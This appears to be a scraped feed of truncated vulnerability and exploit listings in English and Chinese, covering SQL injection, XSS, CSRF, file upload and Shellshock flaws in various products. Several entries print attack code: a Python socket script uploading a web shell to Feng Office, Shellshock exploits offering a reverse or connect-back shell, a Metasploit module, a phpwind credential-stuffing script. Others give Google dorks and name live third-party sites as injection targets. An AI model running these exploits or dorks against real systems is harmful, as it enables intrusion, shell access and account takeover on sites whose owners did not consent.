Belkin Router Information Disclosure

Remote information disclosure Vulnerability Type: File Disclosure For the exploit source code contact DSquare Security sales team...

某通用型校园校务系统SQL注入之二

简要描述： boom！！！ 详细说明： 厂商：南京苏亚星资讯科技开发有限公司 漏洞位于：/SM2005/jiaoshi/InfoSet/Left.asp?id= id参数没有过滤，导致注射。 直接访问http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/ 有个越权报错，查看源代码可以拼接成注入链接 百度关键字:/SM2005 列举5个案例证明通用性： http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0 Place: GET Parameter: id Type: stacked...

Mouse Media Script 1.6 0 - Stored XSS Vulnerability

No description provided by source. Exploit Title: Mouse Media Script Stored XSS Vulnerability Google Dork: "is your best source of fun." inurl:/view/popular Date: 04-10-2014 Exploit Author: Halil Dalabasmaz Version: v1.6 Software Link: http://codecanyon.net/item/mouse-media-script/7773254 Softwar...

Feng Office 1.7.4 - Arbitrary File Upload

No description provided by source...

phpwind登录处可撞库可锁定他人帐号

简要描述： Phpwind在登录处可以撞库官网演示 以及锁定他人帐号，可持续批量锁定是不是很爽，未测试。。。。。 开启验证码也可绕过。 详细说明： 黑盒测试的直接说怎么用吧。 1. 我们先把所有帐号的用户提取出来。 代码如下 def getuid: con=urllib2.urlopen"http://www.phpwind.net/index.php?m=space&uid="+struid.read r=re.compile'\S+的个人空间' return r.findallcon 2. 再来做个社工库的接口，根据用户名提取密码。 def getpassname:...

ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Persistent Cross-Site Scripting

Exploit Title: ZTE Modem Stored XSS Vulnerability Date: 30-10-2014 Exploit Author: Ravi Rajput aka Gr3y n00b IHT team Version: ZXDSL 531BIIV7.3.0fD09IN Software Link:http://wwwen.zte.com.cn Tested on : Windows 7 code : GET...

Feng Office 1.7.4 - XSS / Arbitrary File Upload Exploit

Exploit for php platform in category web applications Source: http://www.securityfocus.com/bid/47049/info alert0" / alert0" / --------------------------------------------- Feng Office 1.7.4 - Arbitrary File Upload --------------------------------------------- import socket host = 'localhost' path...

Feng Office 1.7.4 - Arbitrary File Upload

import socket host = 'localhost' path = '/fengcommunity' shellpath = '/tmp' port = 80 def uploadshell: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connecthost, port s.settimeout8 s.send'POST ' + path + '/public/assets/javascript/ckeditor/ckuploadhandler.php HTTP/1.1\r\n' 'Host:...

Сross-Site Request Forgery (CSRF) in xEpan

High-Tech Bridge Security Research Lab discovered vulnerability in xEpan, which can be exploited to compromise vulnerable web site. 1 Сross-Site Request Forgery CSRF in xEpan: CVE-2014-8429 The vulnerability exists due to insufficient validation of the HTTP request origin when creating new user...

Discuz! 多个版本HTTP host头攻击漏洞

简要描述： 怎么没人提交此类漏洞？那就让我先来吧！ 详细说明： http://drops.wooyun.org/papers/1383 首先向James Kettle致敬 下面以Discuz! X3.2为例，作个演示 漏洞证明： 以http://bbs.locojoy.com/为例， 1.易得其ip为 115.29.162.113 2.向hosts添加条目 115.29.162.113 www.evil.com 3.访问http://www.evil.com 找回密码，输入攻击目标的email，提交 4.受害人收到email...

DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities

DrayTek VigorACS SI versions 1.3.0 and below suffer from local file inclusion, remote file upload, file write, and default login vulnerabilities. DrayTek VigorACS SI /ACSServer/ We found that most of the VigorACS SI deployments are using the default http authentication settings acs/password. This...

YXcms越权修改任意用户资料，获取任意用户密码

简要描述： YXcms建站系统修改用户资料时，对用户身份没有进行验证，导致越权操作 详细说明： 1、涉及版本YXcms1.2.6 2、下载地址：http://www.yxcms.net/ 系统演示地址：http://demo.yxcms.net/index.html 3、用户完善自己资料内容时，系统根据用户id在后台进行操作。但用户id的设置只是简单的数字，因此通过修改id，我们可以修改任意用户的资料信息。 漏洞证明： 1、登录系统，进入会员中心，在资料完善模块填写要修改的用户基本资料。 2、为了演示漏洞，我们注册了一个id为1的被攻击账户，抓包修改id为被攻击者的id，即为1。...

Apache mod_cgi Remote Command Execution

! /usr/bin/env python from socket import from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage: print """ Shellshock apache modcgi remote exploit Usage: ./exploit.py var= Vars: rhost: victim host rport: victim port for TCP shell...

EMC AlphaStor Device Manager Opcode 0x75 Command Injection

No description provided by source. require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager def initializeinfo = superupdateinfoinfo, 'Name' = 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',...

Gnu Bash 4.3 CGI REFERER Command Injection

!/usr/bin/perl Title: Bash/cgi command execution exploit CVE: CVE-2014-6271 Author: Simo Ben youssef Contact: SimoatMorxploitcom Coded: 25 September 2014 Published: 26 September 2014 MorXploit Research http://www.MorXploit.com Description: Perl code to exploit CVE-2014-6271. Injects a Perl connec...

EduSoho通用网络课堂产品任意删除第二发

简要描述： 厂商态度很好，修复速度真快。给了个测试站让帮忙测试下。所有我又来了 详细说明： 来看看小组发帖的地方。 http://t5.edusoho.cn/group/2/thread/7?page=1post-85 随便回复一条。 然后在删除的地方有了点问题。 抓个包看下。 如上。。在POST的url中存在评论的ID和会员的ID 而这两个参数都可以在帖子中获得 修改如下 发送数据 返回查看结果。 已经没了。。 漏洞证明： 来看看小组发帖的地方。 http://t5.edusoho.cn/group/2/thread/7?page=1post-85 随便回复一条。...

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution

No description provided by source...

CacheGuard-OS 5.7.7 - CSRF Vulnerability

No description provided by source. I. VULNERABILITY ------------------------- CSRF vulnerabilities in CacheGuard-OS v5.7.7 II. BACKGROUND ------------------------- CacheGuard is an All-in-One Web Security Gateway providing firewall, web antivirus, caching, compression, URL filtering, proxy, high...

CVE-2014-6436

creationtimestamp| type| source ---|---|--- 2014-09-15 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/39316...

JCMS /opr_domsg.jsp SQL注入漏洞

No description provided by source...